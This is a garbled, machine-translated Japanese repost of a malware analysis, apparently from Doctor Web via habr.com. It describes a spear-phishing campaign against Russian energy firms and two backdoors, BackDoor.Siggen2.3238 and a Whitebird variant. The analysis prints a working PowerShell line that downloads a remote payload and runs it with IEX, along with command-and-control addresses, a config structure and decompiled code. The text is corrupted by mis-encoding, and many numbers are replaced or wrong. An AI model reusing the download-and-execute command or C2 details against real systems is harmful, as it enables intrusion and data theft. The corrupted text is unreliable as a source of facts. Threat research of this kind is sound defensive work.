ã³ã³ãã¥ãŒã¿ ã»ãã¥ãªã㣠ã€ã³ã·ãã³ãã®èª¿æ»ã«ãããåœç€Ÿã®çµéšã«ããã°ãæ»æè
ãæåã«æ»æ察象ã®ãããã¯ãŒã¯ ã€ã³ãã©ã¹ãã©ã¯ãã£ã«äŸµå
¥ããããã«é»åã¡ãŒã«ãäŸç¶ãšããŠäœ¿çšãããæãäžè¬çãªãã£ãã«ã® XNUMX ã€ã§ããããšãããããŸãã çããã (ãŸãã¯ããã»ã©çãããã§ã¯ãªã) æçŽã«å¯Ÿãã XNUMX ã€ã®äžæ³šæãªè¡åããããªãææã®å
¥ãå£ãšãªãããããµã€ããŒç¯çœªè
ã¯æåã®çšåºŠã«å·®ã¯ãããã®ã®ããœãŒã·ã£ã« ãšã³ãžãã¢ãªã³ã°ææ³ãç©æ¥µçã«äœ¿çšããŠããŸãã
ãã®æçš¿ã§ã¯ããã·ã¢ã®çæã»ãšãã«ã®ãŒè€åæœèšã®å€æ°ã®äŒæ¥ãæšçãšããã¹ãã ãã£ã³ããŒã³ã«é¢ããæè¿ã®èª¿æ»ã«ã€ããŠã話ããããšæããŸãã ãã¹ãŠã®æ»æã¯åœã®é»åã¡ãŒã«ã䜿çšããåãã·ããªãªã«åŸã£ãŠããããããã®é»åã¡ãŒã«ã®ããã¹ãå
容ã«å€ãã®åŽåãè²»ããã人ã¯ããªãã£ãããã§ãã
æ¢æ»
ãã¹ãŠã¯ 2020 幎 XNUMX ææ«ã«å§ãŸããŸãããDoctor Web ã®ãŠã€ã«ã¹ ã¢ããªã¹ãããããã«ãŒããã·ã¢ã®çæã»ãšãã«ã®ãŒè€åæœèšã®å€æ°ã®äŒæ¥ã®åŸæ¥å¡ã«ææ°ã®é»è©±åž³ãéä¿¡ããã¹ãã ãã£ã³ããŒã³ãæ€åºãããšãã§ãã ãã¡ããããã£ã¬ã¯ããªã¯å®éã®ãã®ã§ã¯ãªãã.docx ããã¥ã¡ã³ãã¯ãªã¢ãŒã ãªãœãŒã¹ãã XNUMX ã€ã®ã€ã¡ãŒãžãããŠã³ããŒããããããããã¯åçŽãªæžå¿µã®è¡šãã§ã¯ãããŸããã§ããã
ãã®ãã¡ã® 2015 ã€ã¯ãnews[.]zannews[.]com ãµãŒããŒãããŠãŒã¶ãŒã®ã³ã³ãã¥ãŒã¿ã«ããŠã³ããŒããããŸããã ãã®ãã¡ã€ã³åãã«ã¶ãã¹ã¿ã³ã®æ±è·æ²æ» ã¡ãã£ã¢ã»ã³ã¿ãŒ zannews[.]kz ã®ãã¡ã€ã³ãšäŒŒãŠããããšã¯æ³šç®ã«å€ããŸãã äžæ¹ã䜿çšããããã¡ã€ã³ã¯ãICEFOG ããã¯ãã¢ã䜿çšããååã«éšåæååãnewsããå«ãããã€ã®æšéŠ¬å¶åŸ¡ãã¡ã€ã³ãåãã TOPNEWS ãšããŠç¥ããã XNUMX 幎ã®å¥ã®ãã£ã³ããŒã³ãããã«æãåºãããŸããã ãã XNUMX ã€ã®èå³æ·±ãç¹åŸŽã¯ãç°ãªãåä¿¡è ã«é»åã¡ãŒã«ãéä¿¡ããå Žåãç»åã®ããŠã³ããŒãèŠæ±ã«ç°ãªãèŠæ±ãã©ã¡ãŒã¿ãŒãŸãã¯äžæã®ç»ååã®ããããã䜿çšããããšã§ãã
ããã¯ãé©åãªã¿ã€ãã³ã°ã§æçŽãéå°ããããšãä¿èšŒããããä¿¡é Œã§ãããå®å ãç¹å®ããããã®æ å ±ãåéããç®çã§è¡ããããã®ãšèããããŸãã SMB ãããã³ã«ã¯ãXNUMX çªç®ã®ãµãŒããŒããã€ã¡ãŒãžãããŠã³ããŒãããããã«äœ¿çšãããããã«ãããåä¿¡ããããã¥ã¡ã³ããéããåŸæ¥å¡ã®ã³ã³ãã¥ãŒã¿ãã NetNTLM ããã·ã¥ãåéãããå¯èœæ§ããããŸããã
ãããŠããããåœã®ãã£ã¬ã¯ããªãå«ãæçŽãã®ãã®ã§ã:
ä»å¹Ž 2019 æãããã«ãŒã¯æ°ãããã¡ã€ã³å sports[.]manhajnews[.]com ã䜿çšããŠç»åãã¢ããããŒããå§ããŸããã åæã®çµæãå°ãªããšã XNUMX 幎 XNUMX æ以éãmanhajnews[.]com ãµããã¡ã€ã³ãã¹ãã ã¡ãŒã«ã«äœ¿çšãããŠããããšãå€æããŸããã ãã®ãã£ã³ããŒã³ã®ã¿ãŒã²ããã® XNUMX ã€ã¯ãã·ã¢ã®å€§èŠæš¡å€§åŠã§ããã
ãŸããXNUMX æãŸã§ã«æ»æã®äž»å¬è ã¯æçŽã®æ°ããæé¢ãèãåºããŸãããä»åã®ææžã«ã¯æ¥çã®çºå±ã«é¢ããæ å ±ãå«ãŸããŠããŸããã æçŽã®æé¢ããã¯ãçè ããã·ã¢èªãæ¯åœèªãšããŠããªãããæå³çã«èªåèªèº«ã«ã€ããŠãã®ãããªå°è±¡ãäžããŠããããšãæããã§ãã£ãã æ®å¿µãªãããæ¥ççºå±ã®ã¢ã€ãã¢ã¯ããã€ãã®ããã«ãåãªãè¡šçŽã§ããããšãå€æããŸãããææžã¯åã³ XNUMX ã€ã®ç»åãããŠã³ããŒããããµãŒããŒã¯ download[.]inklingpaper[.]com ã«å€æŽãããŸããã
次ã®ã€ãããŒã·ã§ã³ã¯ XNUMX æã«ç¶ããŸããã ãŠã€ã«ã¹å¯Ÿçããã°ã©ã ã«ããæªæã®ããããã¥ã¡ã³ãã®æ€åºãåé¿ããããšããŠãæ»æè ã¯ãã¹ã¯ãŒãã§æå·åããã Microsoft Word ããã¥ã¡ã³ãã䜿çšãå§ããŸããã åæã«ãæ»æè ã¯å€å žçãªãœãŒã·ã£ã« ãšã³ãžãã¢ãªã³ã°ææ³ã§ããå ±é ¬éç¥ã䜿çšããããšã決å®ããŸããã
äžèšŽæã¯åã³åãã¹ã¿ã€ã«ã§æžãããŠãããåä¿¡è
ã®éã§ãããªãçæãåŒãèµ·ãããã ç»åãããŠã³ããŒããããµãŒããŒãå€æŽãããŸããã
ãããã®å ŽåããæçŽã®éä¿¡ã«ã¯ mail[.]ru ãã¡ã€ã³ãš yandex[.]ru ãã¡ã€ã³ã«ç»é²ãããé»åã¡ãŒã«ããã¯ã¹ã䜿çšãããããšã«æ³šæããŠãã ããã
ã¢ã¿ãã¯
2020 幎 XNUMX æåæ¬ãŸã§ã«ãè¡åãèµ·ããææãæ¥ãŸããã åœç€Ÿã®ãŠã€ã«ã¹ ã¢ããªã¹ãã¯ãæ»æè ãé»è©±åž³ã®æŽæ°ãå£å®ã«åã³æçŽãéä¿¡ããæ°ããªæ»æã®æ³¢ãèšé²ããŸããã ãã ããä»åã®æ·»ä»ãã¡ã€ã«ã«ã¯æªæã®ãããã¯ããå«ãŸããŠããŸããã
æ·»ä»ãããããã¥ã¡ã³ããéããšããã¯ãã«ãã£ãŠ XNUMX ã€ã®ãã¡ã€ã«ãäœæãããŸããã
- VBS ã¹ã¯ãªãã %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbsãããã ãã¡ã€ã«ãèµ·åããããã®ãã®ã§ãã
- ããã ãã¡ã€ã«èªäœ %APPDATA%configstest.bat ã¯é£èªåãããŠããŸãã
ãã®äœæ¥ã®æ¬è³ªã¯ãç¹å®ã®ãã©ã¡ãŒã¿ãæå®ã㊠Powershell ã·ã§ã«ãèµ·åããããšã«ãããŸãã ã·ã§ã«ã«æž¡ããããã©ã¡ãŒã¿ã¯ã³ãã³ãã«ãã³ãŒããããŸãã
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;
æ瀺ãããã³ãã³ãããåããããã«ããã€ããŒãã®ããŠã³ããŒãå
ã®ãã¡ã€ã³ã¯åã³ãã¥ãŒã¹ ãµã€ãã«åœè£
ãããŸãã ã·ã³ãã«ãª
BackDoor.Siggen2.3238
æåã®ãã®ã¯ BackDoor.Siggen2.3238 â åœç€Ÿã®å°é家ã¯ãããŸã§ééããããšããªããä»ã®ãŠã€ã«ã¹å¯Ÿçãã³ããŒããããã®ããã°ã©ã ã«ã€ããŠã®èšåã¯ãããŸããã§ããã
ãã®ããã°ã©ã 㯠C++ ã§æžããã32 ããã Windows ãªãã¬ãŒãã£ã³ã° ã·ã¹ãã äžã§å®è¡ãããããã¯ãã¢ã§ãã
BackDoor.Siggen2.3238 ã¯ãHTTP ãš HTTPS ã® XNUMX ã€ã®ãããã³ã«ã䜿çšããŠç®¡çãµãŒããŒãšéä¿¡ã§ããŸãã ãã¹ãããããµã³ãã«ã¯ HTTPS ãããã³ã«ã䜿çšããŸãã ãµãŒããŒãžã®ãªã¯ãšã¹ãã§ã¯ã次ã®ãŠãŒã¶ãŒ ãšãŒãžã§ã³ãã䜿çšãããŸãã
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
ãã®å Žåããã¹ãŠã®ãªã¯ãšã¹ãã«ã¯æ¬¡ã®ãã©ã¡ãŒã¿ã®ã»ãããæå®ãããŸãã
%s;type=%s;length=%s;realdata=%send
ããã§ãåè¡ %s ã¯æ¬¡ã®ããã«çœ®ãæããããŸãã
- ææããã³ã³ãã¥ãŒã¿ã®IDã
- éä¿¡ããããªã¯ãšã¹ãã®ã¿ã€ãã
- realdata ãã£ãŒã«ãã®ããŒã¿ã®é·ãã
- ããŒã¿
ææããã·ã¹ãã ã«é¢ããæ å ±ãåéãã段éã§ãããã¯ãã¢ã¯æ¬¡ã®ãããªè¡ãçæããŸãã
lan=%s;cmpname=%s;username=%s;version=%s;
ããã§ãlan ã¯ææããã³ã³ãã¥ãŒã¿ã® IP ã¢ãã¬ã¹ãcmpname ã¯ã³ã³ãã¥ãŒã¿åãusername ã¯ãŠãŒã¶ãŒåãversion ã¯è¡ 0.0.4.03 ã§ãã
sysinfo èå¥åãæã€ãã®æ å ±ã¯ãPOST ãªã¯ãšã¹ããä»ã㊠https[:]//31.214[.]157.14/log.txt ã«ããã³ã³ãããŒã« ãµãŒããŒã«éä¿¡ãããŸãã å¿çããå Žå BackDoor.Siggen2.3238 HEART ä¿¡å·ãåä¿¡ãããšãæ¥ç¶ã¯æåãããšã¿ãªãããããã¯ãã¢ã¯ãµãŒããŒãšã®éä¿¡ã®ã¡ã€ã³ ãµã€ã¯ã«ãéå§ããŸãã
åäœåçã®ããå®å
šãªèª¬æ BackDoor.Siggen2.3238 ç§ãã¡ã®äžã«ãããŸã
ããã¯ãã¢.ãã¯ã€ãããŒã.23
32 çªç®ã®ããã°ã©ã 㯠BackDoor.Whitebird ããã¯ãã¢ãä¿®æ£ãããã®ã§ãã«ã¶ãã¹ã¿ã³ã®æ¿åºæ©é¢ãšã®äºä»¶ã§ãã§ã«ç¥ãããŠããŸãã ãã®ããŒãžã§ã³ã¯ C++ ã§æžãããŠããã64 ããããš XNUMX ãããã®äž¡æ¹ã® Windows ãªãã¬ãŒãã£ã³ã° ã·ã¹ãã ã§å®è¡ã§ããããã«èšèšãããŠããŸãã
ãã®ã¿ã€ãã®ã»ãšãã©ã®ããã°ã©ã ãšåæ§ã ããã¯ãã¢.ãã¯ã€ãããŒã.23 å¶åŸ¡ãµãŒããŒãšã®æå·åæ¥ç¶ã確ç«ããææããã³ã³ãã¥ãŒã¿ãäžæ£ã«å¶åŸ¡ããããã«èšèšãããŠããŸãã ãããããŒã䜿çšããŠäŸµå®³ãããã·ã¹ãã ã«ã€ã³ã¹ããŒã«ããã
ç§ãã¡ã調ã¹ããµã³ãã«ã¯ã次㮠XNUMX ã€ã®ãšã¯ã¹ããŒããå«ãæªæã®ããã©ã€ãã©ãªã§ããã
- ã°ãŒã°ã«ãã¬ã€
- ãã¹ãã
äœæ¥ã®éå§æã«ããã€ã 0x99 ãšã® XOR æŒç®ã«åºã¥ãã¢ã«ãŽãªãºã ã䜿çšããŠãããã¯ãã¢æ¬äœã«çµã¿èŸŒãŸããèšå®ã埩å·ããŸãã æ§æã¯æ¬¡ã®ããã«ãªããŸãã
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
äžå®ã®åäœãä¿èšŒããããã«ãããã¯ãã¢ã¯ãã£ãŒã«ãã«æå®ãããå€ãå€æŽããŸãã å€åæé æ§æã ãã®ãã£ãŒã«ãã«ã¯ 1440 ãã€ããå«ãŸããŠãããå€ 0 ãŸã㯠1 ããšããXNUMX æ¥ã®åæéã®ååãè¡šããŸãã ãããã¯ãŒã¯ ã€ã³ã¿ãŒãã§ã€ã¹ããšã«åå¥ã®ã¹ã¬ãããäœæããã€ã³ã¿ãŒãã§ã€ã¹ããªãã¹ã³ããææããã³ã³ãã¥ãŒã¿ããã®ãããã· ãµãŒããŒäžã®èªèšŒãã±ãããæ¢ããŸãã ãã®ãããªãã±ãããæ€åºããããšãããã¯ãã¢ã¯ãããã· ãµãŒããŒã«é¢ããæ å ±ããªã¹ãã«è¿œå ããŸãã ããã«ãWinAPI çµç±ã§ãããã·ã®ååšã確èªããŸãã InternetQueryOptionW.
ããã°ã©ã ã¯çŸåšã®åãšæéããã§ãã¯ãããã£ãŒã«ãå ã®ããŒã¿ãšæ¯èŒããŸãã å€åæé æ§æã 察å¿ããåã®å€ããŒãã§ãªãå Žåãã³ã³ãããŒã« ãµãŒããŒãšã®æ¥ç¶ã確ç«ãããŸãã
ãµãŒããŒãžã®æ¥ç¶ã確ç«ãããšãã¯ã©ã€ã¢ã³ããšãµãŒããŒéã® TLS ããŒãžã§ã³ 1.0 ãããã³ã«ã䜿çšããæ¥ç¶ã®äœæãã·ãã¥ã¬ãŒããããŸãã ããã¯ãã¢ã®æ¬äœã«ã¯ XNUMX ã€ã®ãããã¡ãŒãå«ãŸããŠããŸãã
æåã®ãããã¡ã«ã¯ãTLS 1.0 Client Hello ãã±ãããå«ãŸããŸãã
1.0 çªç®ã®ãããã¡ã«ã¯ãããŒé·ã 0x100 ãã€ãã® TLS XNUMX ã¯ã©ã€ã¢ã³ã ããŒäº€æãã±ãããæå·ä»æ§ã®å€æŽãæå·åããããã³ãã·ã§ã€ã¯ ã¡ãã»ãŒãžãå«ãŸããŠããŸãã
Client Hello ãã±ãããéä¿¡ãããšããããã¯ãã¢ã¯çŸåšæå»ã® 4 ãã€ããšã次ã®ããã«èšç®ããã 28 ãã€ãã®æ¬äŒŒã©ã³ãã ããŒã¿ã Client Random ãã£ãŒã«ãã«æžã蟌ã¿ãŸãã
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
åä¿¡ãããã±ããã¯å¶åŸ¡ãµãŒããŒã«éä¿¡ãããŸãã å¿ç (Server Hello ãã±ãã) ã¯ä»¥äžããã§ãã¯ããŸãã
- TLS ãããã³ã« ããŒãžã§ã³ 1.0 ã«æºæ ã
- ã¯ã©ã€ã¢ã³ãã«ãã£ãŠæå®ãããã¿ã€ã ã¹ã¿ã³ã (ã©ã³ãã ããŒã¿ ãã±ãã ãã£ãŒã«ãã®æåã® 4 ãã€ã) ãšãµãŒããŒã«ãã£ãŠæå®ãããã¿ã€ã ã¹ã¿ã³ãã®å¯Ÿå¿ã
- ã¯ã©ã€ã¢ã³ããšãµãŒããŒã®ã©ã³ãã ããŒã¿ ãã£ãŒã«ãã®ã¿ã€ã ã¹ã¿ã³ãåŸã®æåã® 4 ãã€ãã®äžèŽã
æå®ãããäžèŽã®å Žåãããã¯ãã¢ã¯ã¯ã©ã€ã¢ã³ã ããŒäº€æãã±ãããæºåããŸãã ãããè¡ãããã«ãã¯ã©ã€ã¢ã³ã ããŒäº€æããã±ãŒãžã®å ¬éããŒãããã³æå·åãã³ãã·ã§ã€ã¯ ã¡ãã»ãŒãž ããã±ãŒãžã®æå·å IV ãšæå·åããŒã¿ãå€æŽããŸãã
次ã«ãããã¯ãã¢ã¯ã³ãã³ã ã¢ã³ã ã³ã³ãããŒã« ãµãŒããŒãããã±ãããåä¿¡ããTLS ãããã³ã«ã®ããŒãžã§ã³ã 1.0 ã§ããããšã確èªããŠãããããã« 54 ãã€ã (ãã±ããã®æ¬æ) ãåãå ¥ããŸãã ããã§æ¥ç¶èšå®ã¯å®äºã§ãã
åäœåçã®ããå®å
šãªèª¬æ ããã¯ãã¢.ãã¯ã€ãããŒã.23 ç§ãã¡ã®äžã«ãããŸã
çµè«ãšçµè«
ææžããã«ãŠã§ã¢ã䜿çšãããã€ã³ãã©ã¹ãã©ã¯ãã£ãåæããçµæããã®æ»æã¯äžåœã® APT ã°ã«ãŒãã®ããããã«ãã£ãŠæºåããããã®ã§ãããšèªä¿¡ãæã£ãŠèšããŸãã æ»æãæåããå Žåã«è¢«å®³è ã®ã³ã³ãã¥ãŒã¿ã«ã€ã³ã¹ããŒã«ãããããã¯ãã¢ã®æ©èœãèæ ®ãããšãææã«ãããå°ãªããšããæ»æãããçµç¹ã®ã³ã³ãã¥ãŒã¿ããæ©å¯æ å ±ãçãŸããŸãã
ããã«ãéåžžã«å¯èœæ§ã®é«ãã·ããªãªã¯ãç¹å¥ãªæ©èœãåããç¹æ®ãªããã€ã®æšéŠ¬ãããŒã«ã« ãµãŒããŒã«ã€ã³ã¹ããŒã«ãããããšã§ãã ãããã«ã¯ããã¡ã€ã³ ã³ã³ãããŒã©ãŒãã¡ãŒã« ãµãŒããŒãã€ã³ã¿ãŒããã ã²ãŒããŠã§ã€ãªã©ãèããããŸããäŸã§ãããããã«ã
åºæïŒ habr.com